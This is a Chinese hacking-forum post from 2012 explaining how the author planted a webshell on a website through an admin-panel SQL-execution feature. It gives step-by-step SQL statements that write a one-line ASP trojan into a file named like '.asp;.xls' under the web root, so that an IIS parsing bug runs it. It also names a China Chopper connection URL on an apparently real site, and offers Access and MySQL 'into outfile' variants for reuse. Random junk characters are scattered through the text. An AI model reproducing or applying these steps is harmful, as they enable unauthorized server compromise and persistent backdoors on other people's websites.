好不容易进了后台,发现啥上传啊。备份啊多木有。" G c' D" K0 k
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的0 T z. O, p7 a# k8 J, P
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,0 G, x2 F' X, t0 C
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
- N1 l# |7 ^6 _3 Q- Z1.create table cmd (a varchar(50))5 R; |* j( |4 B( B) u5 u, f y' E
2.insert into cmd (a) values (‘‘)
( P% k4 @( w7 [3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd$ O: {: l7 e- Q/ I) Y
(把表cmd的内容导出为物理路径的一个EXCEL文件)
. p+ b+ t5 J1 R5 Z' w% U6 J' C4.drop table cmd& c1 s/ E' l1 u' G
利用IIS的BUG成功拿到了WEBSHELL。8 X/ R9 P, b6 | u( W( _( F, Z
5 X" s5 e2 [; r
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话* I+ G' ?# y/ w6 d
6 q" M2 h7 S1 F/ i& c( S SQL语句意思解释:
9 r+ B& t* U9 M' v: N q 第一句* R8 g# E8 E/ K% ^/ `/ N, M
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
) P8 ?" `# W0 ~$ `& h" l8 M* h/ I) B* ^$ r2 }) o; c: V
第二句
: {, o1 V; I8 Q: \* m! M/ o8 P8 w+ d 在表cmd的a字段插入一句话木马6 r8 }$ P/ p. \( _: m: N. f. q! s
第三句
1 I+ M% ~" _3 l4 V 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
+ |: P+ Y$ K7 O; s& o h/ O( g& C s* {+ c0 P& d' }9 Q, P" e6 m
第四句
4 \: u) |( ^- { 删除建立的cmd表# F2 v% j( d4 \( `# x
5 `/ c0 I1 ^+ X9 V5 \1 F$ E 以下内容为测试:
4 ]4 L7 x" E9 W8 T+ v+ M Access利用后台SQL执行命令功能导出WebShell:
7 R8 y2 o1 S7 p* E2 Z4 \. F 这个更简单:% d+ a" K% n- W1 }; O
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]/ G. S- y7 F! B
或者. {# ~) s4 ^6 l: K0 N* B
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]# B7 N+ h/ h0 A- b0 t1 I3 G3 {
9 c( U" o# C+ G7 b6 g" o" q& I7 p 后台有执行SQL语句功能(vote为已知表段)* T/ z8 m. x1 T7 P
希望对大家有所帮助拿shell的又一个思路. Q5 G1 @$ H$ x: N: m) a1 Q
|
发表于 2012-9-13 17:53:58
收藏
支持
反对